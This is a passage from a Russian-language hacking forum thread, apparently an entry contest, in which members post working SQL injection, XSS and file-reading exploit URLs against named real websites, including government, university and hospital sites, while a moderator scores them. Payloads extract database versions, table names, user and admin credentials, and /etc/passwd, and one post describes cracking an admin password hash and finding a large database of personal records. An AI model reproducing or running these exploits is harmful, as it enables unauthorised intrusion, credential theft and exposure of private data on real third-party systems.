P.S Там еще и XSS уязвимость есть: вместо 3,5 или 7 подставляем alert('antichat.ru')
6)Сайт:
http://prokudin-gorskiy.ru
Уязвимость: XSS
Эксплойт:
http://prokudin-gorskiy.ru/search.php?send=on&scope=1&key=alert('antichat.ru')


SQL защитано, XSS нет, в конкурсе запрещены ru/ua

semen6192
30.06.2015, 00:26
1)Сайт: http://dogarchive.kennel-apbt.com/

Уязвимость SQLi

Эксплойт: http://dogarchive.kennel-apbt.com/php_users/htdocs/login.php?returnto=/index.php (http://dogarchive.kennel-apbt.com/php_users/htdocs/login.php?returnto=%2Findex.php)

вписываем:

логин - ' or 1=1#

пароль - ' or 1=1 '#

И видим снизу:Online registred users:admin и т.д

2) Сайт: http://lineforheaven.com/soul.php?id=174

Уязвимость: SQLi

Эксплойт: http://lineforheaven.com/soul.php?i...version(),25,26,27,28,29,30,31,32,33, 34,35 -- (http://lineforheaven.com/soul.php?id=-174 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,version(),25,26,27,28,29,30,31,32,33,34, 35 --)

3)Сайт: https://www.harptabs.com

Уязвимость: SQLi

Эксплойт: https://www.harptabs.com/login.php

Я нашел логин пользователя на сайте и вписал:

Логин: Ceja8460' or 1=1#

Пароль: Ceja8460' or 1=1 '#

Зашло под логином:

Welcome, Ceja8460' or 1=1#

4)Сайт: http://www.ibdb.com/search.php

Уязвимость: XSS

Эксплойт: http://www.ibdb.com/search.php

в поле поиска вписываем: alert('antichat.ru')

5)Сайт: http://www.kpa.gov.my

Уязвимость: XSS(в поиску), SQLi

Єксплойт: http://www.kpa.gov.my/pages.php?mod=search_result

SQLi не могу развести, да и точно не знаю есть ли она там, вот ссылка:

http://www.kpa.gov.my/modules/web/page_print.php?id=

3nvY
02.07.2015, 20:20
Допустим что я нашёл ХХЕ. Как правильно её постить тут и что должно быть в выводе?

faza02
02.07.2015, 21:38
↑ (https://antichat.live/posts/3864572/)
Допустим что я нашёл ХХЕ. Как правильно её постить тут и что должно быть в выводе?


например, прочитать /etc/passwd. выложить полный запрос (можно перехватить через burp suite, например)

joelblack
08.07.2015, 14:33
target:police.gov.bd

type:SQL Injection

version:5.1.69


http://www.police.gov.bd/history.php?id=51'+union+select+1,2,table_name,4,5 ,6,7,8,9,10,11,12,13,14,15,16+from+information_sch ema.tables+--+

BigBear
08.07.2015, 14:46
↑ (https://antichat.live/posts/3863642/)
1)Сайт:
http://dogarchive.kennel-apbt.com/
Уязвимость SQLi
Эксплойт:
http://dogarchive.kennel-apbt.com/php_users/htdocs/login.php?returnto=/index.php (http://dogarchive.kennel-apbt.com/php_users/htdocs/login.php?returnto=%2Findex.php)
вписываем:
логин - ' or 1=1#
пароль - ' or 1=1 '#
И видим снизу:
Online registred users:
admin и т.д
2) Сайт:
http://lineforheaven.com/soul.php?id=174
Уязвимость: SQLi
Эксплойт:
http://lineforheaven.com/soul.php?i...version(),25,26,27,28,29,30,31,32,33, 34,35 -- (http://lineforheaven.com/soul.php?id=-174 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,version(),25,26,27,28,29,30,31,32,33,34, 35 --)
3)Сайт:
https://www.harptabs.com
Уязвимость: SQLi
Эксплойт:
https://www.harptabs.com/login.php
Я нашел логин пользователя на сайте и вписал:
Логин: Ceja8460' or 1=1#
Пароль: Ceja8460' or 1=1 '#
Зашло под логином:
Welcome, Ceja8460' or 1=1#
4)Сайт:
http://www.ibdb.com/search.php
Уязвимость: XSS
Эксплойт:
http://www.ibdb.com/search.php
в поле поиска вписываем: alert('antichat.ru')
5)Сайт:
http://www.kpa.gov.my
Уязвимость: XSS(в поиску), SQLi
Єксплойт:
http://www.kpa.gov.my/pages.php?mod=search_result
SQLi не могу развести, да и точно не знаю есть ли она там, вот ссылка:
http://www.kpa.gov.my/modules/web/page_print.php?id=


1) SQL в username, а не в поле пароля.

admin'or(1)='1

123

2) ОК

3) Не смог разлогиниться, удаление куков не помогло.

Тоже ошибся в каком-то из полей.

4) Наверное всё-таки не стоит указывать имя ресурса. Администрация уязвимого ресурса (а они смотрят логи), да и форума, скорее всего, не одобрит.

5) SQL Inj там нету. Ошибка из NULL в качестве значения переменной.

ocheretko
10.07.2015, 04:09
XSS уязвимость


http://www.001kanpou.com/search.asp?searchkey=%3C/div%3E%3C/div%3E%3C/form%3E%3Cbody%20background=%22/img/logo.gif%22%20width=%22100%%22%20height=%22100%%22 %3E%3Cscript%3Ealert%28
/XSS/%29%3C/script%3E

ocheretko
10.07.2015, 06:20
Сайт: http://celtsat.com.br

Уязвимость: SQL Injection

Эксплоит:


http://celtsat.com.br/produto_cat.php?id=13+and+1=0+%20Union+Select+0x78 7878756E696F6E787878+,0x787878756E696F6E787878--

Сайт: www.albit.com.au (http://www.albit.com.au)

Уязвимость: SQL Injection

Эксплоит:


http://www.albit.com.au/product_cat.php?id=28+and+1=0+%20Union+Select+0x78 7878756E696F6E787878+,0x787878756E696F6E787878--


Сайт: nijifan.com

Уязвимость: SQL Injection

Эксплоит:


http://nijifan.com/index.php?Language=1&cat_id=222&scat_id=301+and+1=0+%20Union+Select+0x787878756E69 6F6E787878+,0x787878756E696F6E787878--


Сайт: www.apva.org (http://www.apva.org)

Уязвимость: SQL Injection

Эксплоит:


http://www.apva.org/rediscovery/page.php?page_id=6+and+1=0+%20Union+Select+0x78787 8756E696F6E787878+,0x787878756E696F6E787878+,0x787 878756E696F6E787878+,0x787878756E696F6E787878--


Сайт: www.th.boots.com (http://www.th.boots.com)

Уязвимость: SQL Injection

Эксплоит:


http://www.th.boots.com/eng/brands_cat.php?brand_id=43+and+1=0+%20Union+Select +0x787878756E696F6E787878+,0x787878756E696F6E78787 8+,0x787878756E696F6E787878+,0x787878756E696F6E787 878+,0x787878756E696F6E787878+,0x787878756E696F6E7 87878+,0x787878756E696F6E787878+,0x787878756E696F6 E787878+,0x787878756E696F6E787878--


Сайт: www.shanson.biz (http://www.shanson.biz)

Уязвимость: SQL Injection

Эксплоит:


http://www.shanson.biz/text/index.php?song=1097+and+1=0+%20Union+Select+0x7878 78756E696F6E787878+,0x787878756E696F6E787878+,0x78 7878756E696F6E787878+,0x787878756E696F6E787878--


Сайт: www.io-arch.com (http://www.io-arch.com)

Уязвимость: SQL Injection

Эксплоит:


http://www.io-arch.com/project.php?project_cat_id=1&project_id=28+and+1=0+%20Union+Select+0x787878756E 696F6E787878+,0x787878756E696F6E787878+,0x78787875 6E696F6E787878+,0x787878756E696F6E787878+,0x787878 756E696F6E787878+,0x787878756E696F6E787878+,0x7878 78756E696F6E787878+,0x787878756E696F6E787878+,0x78 7878756E696F6E787878--


Сайт: www.tokaiguitar.de (http://www.tokaiguitar.de)

Уязвимость: SQL Injection

Эксплоит:


http://www.tokaiguitar.de/produktdetail.php?id=15+and+1=0+%20Union+Select+0x 787878756E696F6E787878+,0x787878756E696F6E787878+, 0x787878756E696F6E787878+,0x787878756E696F6E787878 +,0x787878756E696F6E787878+,0x787878756E696F6E7878 78+,0x787878756E696F6E787878+,0x787878756E696F6E78 7878--


Сайт: islamic-wallpapers.com

Уязвимость: SQL Injection

Эксплоит:


http://islamic-wallpapers.com/sub_cat.php?id=4+and+1=0+%20Union+Select+0x7878787 56E696F6E787878+,0x787878756E696F6E787878--


Сайт: www.florentina.ro (http://www.florentina.ro)

Уязвимость: SQL Injection

Эксплоит:


http://www.florentina.ro/index.php?cat_id=11+and+1=0+%20Union+Select+0x7878 78756E696F6E787878+,0x787878756E696F6E787878--


Сайт: www.pronv.us (http://www.pronv.us)

Уязвимость: SQL Injection

Эксплоит:


http://www.pronv.us/catalog.php?id_cat=19&sm=3+and+1=0+%20Union+Select+0x787878756E696F6E787 878+,0x787878756E696F6E787878+,0x787878756E696F6E7 87878+,0x787878756E696F6E787878+,0x787878756E696F6 E787878+,0x787878756E696F6E787878+,0x787878756E696 F6E787878+,0x787878756E696F6E787878+,0x787878756E6 96F6E787878+,0x787878756E696F6E787878+,0x787878756 E696F6E787878+,0x787878756E696F6E787878+,0x7878787 56E696F6E787878+,0x787878756E696F6E787878+,0x78787 8756E696F6E787878+,0x787878756E696F6E787878+,0x787 878756E696F6E787878+,0x787878756E696F6E787878+,0x7 87878756E696F6E787878+,0x787878756E696F6E787878--


Сайт: ravco.jp

Уязвимость: SQL Injection

Эксплоит:


http://www.ravco.jp/cat/view.php?cat_id=6138+and+1=0+%20Union+Select+0x787 878756E696F6E787878+,0x787878756E696F6E787878+,0x7 87878756E696F6E787878+,0x787878756E696F6E787878+,0 x787878756E696F6E787878+,0x787878756E696F6E787878+ ,0x787878756E696F6E787878+,0x787878756E696F6E78787 8+,0x787878756E696F6E787878+,0x787878756E696F6E787 878+,0x787878756E696F6E787878+,0x787878756E696F6E7 87878+,0x787878756E696F6E787878+,0x787878756E696F6 E787878+,0x787878756E696F6E787878--


Сайт: www.themasterswoodshop.com (http://www.themasterswoodshop.com)

Уязвимость: SQL Injection

Эксплоит:


http://www.themasterswoodshop.com/collection_cat.php?ID=2+and+1=0+%20Union+Select+0x 787878756E696F6E787878+,0x787878756E696F6E787878+, 0x787878756E696F6E787878+,0x787878756E696F6E787878--

ocheretko
10.07.2015, 06:31
Сайт:www.themasterswoodshop.com (http://www.themasterswoodshop.com)

Уязвимость: Local File Reading

Эксплоит:


http://www.themasterswoodshop.com/collection_cat.php?ID=2+and+1=0+%20Union%20Select% 20%201,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file( 0x2F6574632F706173737764),0x5B6B65795D)))%20,3,4--

Сайт:www.io-arch.com (http://www.io-arch.com)

Уязвимость: Local File Reading

Эксплоит:


http://www.io-arch.com/project.php?project_cat_id=1&project_id=28+and+1=0+%20Union%20Select%20%201,%20 UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F657463 2F706173737764),0x5B6B65795D)))%20,3,4,5,6,7,8,9--

Сайт:www.ravco.jp (http://www.ravco.jp)

Уязвимость: Local File Reading

Эксплоит:


http://www.ravco.jp/cat/view.php?cat_id=6138+and+1=0+%20Union%20Select%20% 20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574 632F706173737764),0x5B6B65795D)%20))%20,%20UNHEX(H EX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F70617 3737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x 5B6B65795D,load_file(0x2F6574632F706173737764),0x5 B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,l oad_file(0x2F6574632F706173737764),0x5B6B65795D))) %20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2 F6574632F706173737764),0x5B6B65795D)))%20,%20UNHEX (HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706 173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT( 0x5B6B65795D,load_file(0x2F6574632F706173737764),0 x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D ,load_file(0x2F6574632F706173737764),0x5B6B65795D) ))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0 x2F6574632F706173737764),0x5B6B65795D)))%20,%20UNH EX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F7 06173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCA T(0x5B6B65795D,load_file(0x2F6574632F706173737764) ,0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B6579 5D,load_file(0x2F6574632F706173737764),0x5B6B65795 D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file (0x2F6574632F706173737764),0x5B6B65795D)))%20,%20U NHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632 F706173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CON CAT(0x5B6B65795D,load_file(0x2F6574632F70617373776 4),0x5B6B65795D)))%20--

Печа
15.07.2015, 02:17
Сайт: http://www.thebandroom.biz/

Уязвимость: SQL Injection

Эксплоит:


http://www.thebandroom.biz/01_search_auto2.php/items.php?id=-1' union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,@@versio n,19,20,21 and '0'='0

Сайт:http://www.sacaindia.org/

Уязвимость: SQL Injection

Эксплоит:


http://www.sacaindia.org/news.php?ID=-1' union all select 1,2,3,current_user,5,6,7,@@version,9,10,11 and '0'='0

Сайт:http://www.offball.com/

Уязвимость: SQL Injection

Эксплоит:


http://www.offball.com/news.php?id=-1 union all select @@version,current_user,3,4,5

Сайт:http://www.coolncute.com/

Уязвимость: SQL Injection

Эксплоит:


http://www.coolncute.com/data/page.php?id=-1 union all select 1,2,3,@@version,current_user,6,7,8,9,10,11,12,13,1 4&sort=1

Сайт:http://www.damandiri.or.id/

Уязвимость: SQL Injection

Эксплоит:


http://www.damandiri.or.id/detail.php?id=-1' union all select 1,2,3,4,5,@@version,7,8,9,10,current_user,12,13 and '0'='0

Сайт:http://www.begeerte.be/

Уязвимость: SQL Injection

Эксплоит:


http://www.begeerte.be/page.php?page=productie&ID=-1' union all select 1,2,3,current_user,@@version,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20 and '0'='0

Сайт:http://www.hospitallocaldepiedecuesta.org/

Уязвимость: SQL Injection

Эксплоит:


http://www.hospitallocaldepiedecuesta.org/page.php?id=-1' union all select 1,2,@@version,4,current_user,6,7,8 and '0'='0

Сайт:http://www.etssp.com/

Уязвимость: SQL Injection

Эксплоит:


http://www.etssp.com/article.php?id=-1 union all select 1,current_user,3,4,@@version,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21--

Сайт:http://www.worldbarefootcouncil.com/

Уязвимость: SQL Injection

Эксплоит:


http://www.worldbarefootcouncil.com/news.php?id=-1' union all select 1,current_user,3,4,@@version,6,7,8,9,10,11 and '0'='0

Сайт:http://www.kulmbacher-tierheim.de/

Уязвимость: SQL Injection

Эксплоит:


http://www.kulmbacher-tierheim.de/Detail.php?ID=-1 union all select 1,2,3,current_user,@@version,6,7,8,9

O1d
16.07.2015, 05:51
http://www.ukeas.ph/ukeasnews-event-detail.php?id=32799999 union select 1,2,3,4,concat_ws(0x3a,user_id,user_name,passwd,em ail),5,6,7,8,9,10,11,12+from+db_users+limit+2,1--

http://www.rokebyschool.co.uk/news/news.php?id=32799999+UNION%20SELECT%201,2,concat_w s(0x3a,id,email,password,admin_user_level_id,activ e),4,5,6,7,8,9,10,11,12+from+admin_users+limit+0,1

И вот не докрутил тут, глянь, интересно что там http://integra.eu/press.cfm?id=327

Abrigen
19.07.2015, 15:01
Сайт: www.marcied.com (http://www.marcied.com)

Уязвимость: SQL Injection

Эксплоит:


http://www.marcied.com/photo.php?id=346+union+select+1,version(),3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17+--+

faza02
20.07.2015, 13:57
↑ (https://antichat.live/posts/3866257/)
target:police.gov.bd

type:SQL Injection

version:5.1.69


http://www.police.gov.bd/history.php?id=51'+union+select+1,2,table_name,4,5 ,6,7,8,9,10,11,12,13,14,15,16+from+information_sch ema.tables+--+



добавил


↑ (https://antichat.live/posts/3866740/)
XSS уязвимость

http://www.001kanpou.com/search.asp?searchkey=%3C/div%3E%3C/div%3E%3C/form%3E%3Cbody%20background=%22/img/logo.gif%22%20width=%22100%%22%20height=%22100%%22 %3E%3Cscript%3Ealert%28
/XSS/%29%3C/script%3E





↑ (https://antichat.live/posts/3866748/)
Сайт:
http://celtsat.com.br
Уязвимость: SQL Injection
Эксплоит:

http://celtsat.com.br/produto_cat.php?id=13+and+1=0+%20Union+Select+0x78 7878756E696F6E787878+,0x787878756E696F6E787878--

Сайт:
www.albit.com.au (http://www.albit.com.au)
Уязвимость: SQL Injection
Эксплоит:

http://www.albit.com.au/product_cat.php?id=28+and+1=0+%20Union+Select+0x78 7878756E696F6E787878+,0x787878756E696F6E787878--

Сайт: nijifan.com
Уязвимость: SQL Injection
Эксплоит:

http://nijifan.com/index.php?Language=1&cat_id=222&scat_id=301+and+1=0+%20Union+Select+0x787878756E69 6F6E787878+,0x787878756E696F6E787878--

Сайт:
www.apva.org (http://www.apva.org)
Уязвимость: SQL Injection
Эксплоит:

http://www.apva.org/rediscovery/page.php?page_id=6+and+1=0+%20Union+Select+0x78787 8756E696F6E787878+,0x787878756E696F6E787878+,0x787 878756E696F6E787878+,0x787878756E696F6E787878--

Сайт:
www.th.boots.com (http://www.th.boots.com)
Уязвимость: SQL Injection
Эксплоит:

http://www.th.boots.com/eng/brands_cat.php?brand_id=43+and+1=0+%20Union+Select +0x787878756E696F6E787878+,0x787878756E696F6E78787 8+,0x787878756E696F6E787878+,0x787878756E696F6E787 878+,0x787878756E696F6E787878+,0x787878756E696F6E7 87878+,0x787878756E696F6E787878+,0x787878756E696F6 E787878+,0x787878756E696F6E787878--

Сайт:
www.shanson.biz (http://www.shanson.biz)
Уязвимость: SQL Injection
Эксплоит:

http://www.shanson.biz/text/index.php?song=1097+and+1=0+%20Union+Select+0x7878 78756E696F6E787878+,0x787878756E696F6E787878+,0x78 7878756E696F6E787878+,0x787878756E696F6E787878--

Сайт:
www.io-arch.com (http://www.io-arch.com)
Уязвимость: SQL Injection
Эксплоит:

http://www.io-arch.com/project.php?project_cat_id=1&project_id=28+and+1=0+%20Union+Select+0x787878756E 696F6E787878+,0x787878756E696F6E787878+,0x78787875 6E696F6E787878+,0x787878756E696F6E787878+,0x787878 756E696F6E787878+,0x787878756E696F6E787878+,0x7878 78756E696F6E787878+,0x787878756E696F6E787878+,0x78 7878756E696F6E787878--

Сайт:
www.tokaiguitar.de (http://www.tokaiguitar.de)
Уязвимость: SQL Injection
Эксплоит:

http://www.tokaiguitar.de/produktdetail.php?id=15+and+1=0+%20Union+Select+0x 787878756E696F6E787878+,0x787878756E696F6E787878+, 0x787878756E696F6E787878+,0x787878756E696F6E787878 +,0x787878756E696F6E787878+,0x787878756E696F6E7878 78+,0x787878756E696F6E787878+,0x787878756E696F6E78 7878--

Сайт: islamic-wallpapers.com
Уязвимость: SQL Injection
Эксплоит:

http://islamic-wallpapers.com/sub_cat.php?id=4+and+1=0+%20Union+Select+0x7878787 56E696F6E787878+,0x787878756E696F6E787878--

Сайт:
www.florentina.ro (http://www.florentina.ro)
Уязвимость: SQL Injection
Эксплоит:

http://www.florentina.ro/index.php?cat_id=11+and+1=0+%20Union+Select+0x7878 78756E696F6E787878+,0x787878756E696F6E787878--

Сайт:
www.pronv.us (http://www.pronv.us)
Уязвимость: SQL Injection
Эксплоит:

http://www.pronv.us/catalog.php?id_cat=19&sm=3+and+1=0+%20Union+Select+0x787878756E696F6E787 878+,0x787878756E696F6E787878+,0x787878756E696F6E7 87878+,0x787878756E696F6E787878+,0x787878756E696F6 E787878+,0x787878756E696F6E787878+,0x787878756E696 F6E787878+,0x787878756E696F6E787878+,0x787878756E6 96F6E787878+,0x787878756E696F6E787878+,0x787878756 E696F6E787878+,0x787878756E696F6E787878+,0x7878787 56E696F6E787878+,0x787878756E696F6E787878+,0x78787 8756E696F6E787878+,0x787878756E696F6E787878+,0x787 878756E696F6E787878+,0x787878756E696F6E787878+,0x7 87878756E696F6E787878+,0x787878756E696F6E787878--

Сайт: ravco.jp
Уязвимость: SQL Injection
Эксплоит:

http://www.ravco.jp/cat/view.php?cat_id=6138+and+1=0+%20Union+Select+0x787 878756E696F6E787878+,0x787878756E696F6E787878+,0x7 87878756E696F6E787878+,0x787878756E696F6E787878+,0 x787878756E696F6E787878+,0x787878756E696F6E787878+ ,0x787878756E696F6E787878+,0x787878756E696F6E78787 8+,0x787878756E696F6E787878+,0x787878756E696F6E787 878+,0x787878756E696F6E787878+,0x787878756E696F6E7 87878+,0x787878756E696F6E787878+,0x787878756E696F6 E787878+,0x787878756E696F6E787878--

Сайт:
www.themasterswoodshop.com (http://www.themasterswoodshop.com)
Уязвимость: SQL Injection
Эксплоит:

http://www.themasterswoodshop.com/collection_cat.php?ID=2+and+1=0+%20Union+Select+0x 787878756E696F6E787878+,0x787878756E696F6E787878+, 0x787878756E696F6E787878+,0x787878756E696F6E787878--



это добавил.


↑ (https://antichat.live/posts/3866749/)
Сайт:
www.themasterswoodshop.com (http://www.themasterswoodshop.com)
Уязвимость:
Local File Reading
Эксплоит:

http://www.themasterswoodshop.com/collection_cat.php?ID=2+and+1=0+%20Union%20Select% 20%201,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file( 0x2F6574632F706173737764),0x5B6B65795D)))%20,3,4--

Сайт:
www.io-arch.com (http://www.io-arch.com)
Уязвимость:
Local File Reading
Эксплоит:

http://www.io-arch.com/project.php?project_cat_id=1&project_id=28+and+1=0+%20Union%20Select%20%201,%20 UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F657463 2F706173737764),0x5B6B65795D)))%20,3,4,5,6,7,8,9--

Сайт:
www.ravco.jp (http://www.ravco.jp)
Уязвимость:
Local File Reading
Эксплоит:

http://www.ravco.jp/cat/view.php?cat_id=6138+and+1=0+%20Union%20Select%20% 20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574 632F706173737764),0x5B6B65795D)%20))%20,%20UNHEX(H EX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F70617 3737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x 5B6B65795D,load_file(0x2F6574632F706173737764),0x5 B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,l oad_file(0x2F6574632F706173737764),0x5B6B65795D))) %20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2 F6574632F706173737764),0x5B6B65795D)))%20,%20UNHEX (HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706 173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT( 0x5B6B65795D,load_file(0x2F6574632F706173737764),0 x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D ,load_file(0x2F6574632F706173737764),0x5B6B65795D) ))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0 x2F6574632F706173737764),0x5B6B65795D)))%20,%20UNH EX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F7 06173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCA T(0x5B6B65795D,load_file(0x2F6574632F706173737764) ,0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B6579 5D,load_file(0x2F6574632F706173737764),0x5B6B65795 D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file (0x2F6574632F706173737764),0x5B6B65795D)))%20,%20U NHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632 F706173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CON CAT(0x5B6B65795D,load_file(0x2F6574632F70617373776 4),0x5B6B65795D)))%20--



это, скорее, sqli с правами на чтение, поэтому защитано как sqli. Добавил +28 очков


↑ (https://antichat.live/posts/3868966/)

http://www.ukeas.ph/ukeasnews-event-detail.php?id=32799999 union select 1,2,3,4,concat_ws(0x3a,user_id,user_name,passwd,em ail),5,6,7,8,9,10,11,12+from+db_users+limit+2,1--

http://www.rokebyschool.co.uk/news/news.php?id=32799999+UNION%20SELECT%201,2,concat_w s(0x3a,id,email,password,admin_user_level_id,activ e),4,5,6,7,8,9,10,11,12+from+admin_users+limit+0,1

И вот не докрутил тут, глянь, интересно что там
http://integra.eu/press.cfm?id=327


добавил


↑ (https://antichat.live/posts/3870146/)
Сайт:
www.marcied.com (http://www.marcied.com)
Уязвимость:
SQL Injection
Эксплоит:

http://www.marcied.com/photo.php?id=346+union+select+1,version(),3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17+--+



sqli гуглится, не добавлена.

faza02
20.07.2015, 13:58
↑ (https://antichat.live/posts/3868461/)
Сайт:
http://www.thebandroom.biz/
Уязвимость: SQL Injection
Эксплоит:

http://www.thebandroom.biz/01_search_auto2.php/items.php?id=-1' union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,@@versio n,19,20,21 and '0'='0

Сайт:
http://www.sacaindia.org/
Уязвимость: SQL Injection
Эксплоит:

http://www.sacaindia.org/news.php?ID=-1' union all select 1,2,3,current_user,5,6,7,@@version,9,10,11 and '0'='0

Сайт:
http://www.offball.com/
Уязвимость: SQL Injection
Эксплоит:

http://www.offball.com/news.php?id=-1 union all select @@version,current_user,3,4,5

Сайт:
http://www.coolncute.com/
Уязвимость: SQL Injection
Эксплоит:

http://www.coolncute.com/data/page.php?id=-1 union all select 1,2,3,@@version,current_user,6,7,8,9,10,11,12,13,1 4&sort=1

Сайт:
http://www.damandiri.or.id/
Уязвимость: SQL Injection
Эксплоит:

http://www.damandiri.or.id/detail.php?id=-1' union all select 1,2,3,4,5,@@version,7,8,9,10,current_user,12,13 and '0'='0

Сайт:
http://www.begeerte.be/
Уязвимость: SQL Injection
Эксплоит:

http://www.begeerte.be/page.php?page=productie&ID=-1' union all select 1,2,3,current_user,@@version,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20 and '0'='0

Сайт:
http://www.hospitallocaldepiedecuesta.org/
Уязвимость: SQL Injection
Эксплоит:

http://www.hospitallocaldepiedecuesta.org/page.php?id=-1' union all select 1,2,@@version,4,current_user,6,7,8 and '0'='0

Сайт:
http://www.etssp.com/
Уязвимость: SQL Injection
Эксплоит:

http://www.etssp.com/article.php?id=-1 union all select 1,current_user,3,4,@@version,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21--

Сайт:
http://www.worldbarefootcouncil.com/
Уязвимость: SQL Injection
Эксплоит:

http://www.worldbarefootcouncil.com/news.php?id=-1' union all select 1,current_user,3,4,@@version,6,7,8,9,10,11 and '0'='0

Сайт:
http://www.kulmbacher-tierheim.de/
Уязвимость: SQL Injection
Эксплоит:

http://www.kulmbacher-tierheim.de/Detail.php?ID=-1 union all select 1,2,3,current_user,@@version,6,7,8,9



тоже все добавил, вы проходите

у нас уже трое человек попавших через конкурс, @Печа (https://antichat.live/members/263247/), @3nvY (https://antichat.live/members/265683/), @ocheretko (https://antichat.live/members/124481/)

ocheretko
22.07.2015, 15:50
Сайт Украинского телеканала


http://www.hromadske.tv/search?s=%27;alert%28%27antichat%27%29;//

Уязвимость интересна новичкам тем, что работает в Chrome - инжект в Javascript var stext1 = '';alert('antichat');//';

Abrigen
22.07.2015, 16:38
Сайт: www.gamagroupusa.com (http://www.gamagroupusa.com)

Уязвимость: Sql inj


http://www.gamagroupusa.com/index.php?i=1+union+select+1,2,3,version()+--+

semen6192
23.07.2015, 10:50
Сайт: http://www.karmatube.org

Уязвимость: XSS

Эксплоит:


http://www.karmatube.org/videos.php?op=filter&cat=%253Cscript%253Ealert%28%25271%2527%29%253C/script%253E

O1d
23.07.2015, 14:15
http://www.sicb.org/

FILE_PRIV=Y

106 columns

/etc/passwd:


http://www.sicb.org/meetings/2015/schedule/abstractdetails.php?id=199999997 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,43,44,45,46,load_file(0x2f6574632 f706173737764),48,49,50,51,52,53,54,55,56,57,58,59 ,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,7 6,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92, 93,94,95,96,97,98,99,100,101,102,103,104,105,106+f rom+mysql.user

Методом ручного фазинга узнаем расположение логов.

Читаем логи /var/log/httpd/error_log и видим расположение файлов веб-сервера в /var/www/html

Читаем .htaccess админки из /var/www/html/admin/.htaccess:


AuthUserFile /home/sicb/includes/.htpasswd
AuthName "SICB Admin realm"
AuthType Basic
require valid-user


Читаем файл с паролем и брутим:


ruedi:UMn02wTYUxVGc -> ottilie


Но фейл в админку не пускает, видимо фильтр по IP т.к. бейсик авторизацию уже мы проходим.

PS БД очень большая в ней 9 БД и инфа начиная с 2002 года о студентах, докторах, профессорах. Дампить не стал.

user6334
23.07.2015, 14:28
Site: http://www.safetylit.org

Уязвимость: SQL Injection

Эксплоит:


http://www.safetylit.org/week/journalpage.php?jid=-1+UNION+SELECT+1,2,3,user(),5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 ,31,32,33,34,35+--+

joelblack
23.07.2015, 15:52
target:http://som.adzu.edu.ph

type:SQL Injection

version:10.0.20-MariaDB-log

user:som@localhost


http://som.adzu.edu.ph/newsupdates/index.php?id=-1+union+select+1,version(),table_name,user(),5,6+f rom+information_schema.tables+--+


target:http://www.bulsu.edu.ph

type:SQL Injection

version:5.1.63-community-log

user:bulsued_friedel@207.198.102.22


http://www.bulsu.edu.ph/footer.php?id=-2 UNION SELECT 1,table_name,3,4,5 FROM INFORMATION_SCHEMA.TABLES


target:http://www.ntc.gov.ph

type:SQL Injection

version:10.0.15-MariaDB

user:root@localhost


http://www.ntc.gov.ph/announcements_news.php?id=-24+union+select+1,version(),user(),4,table_name,6, 7+from+information_schema.tables+--+

target:http://www.irishsanghatrust.ie

type:SQL Injection

version:5.0.83-community

user:u1094094_sangha@172.16.5.126


http://www.irishsanghatrust.ie/news.php?id=-33+union+select+1,version(),user(),4,5,6,7,table_n ame,9,10,11,12,13,141,15,16,17,18+from+information _schema.tables+--+


target:http://www.mtzwear.com

type:SQL Injection

version:5.5.10

user:mtzwear.com@localhost


http://www.mtzwear.com/eng/art_catalogo.php?id=-43 union select 1,2,3,4,5,6,7,8,table_name,user(),11 from information_schema.tables

user6334
24.07.2015, 07:03
Site: http://www.packsend.co.uk

Уязвимость: SQL Injection

Эксплоит:


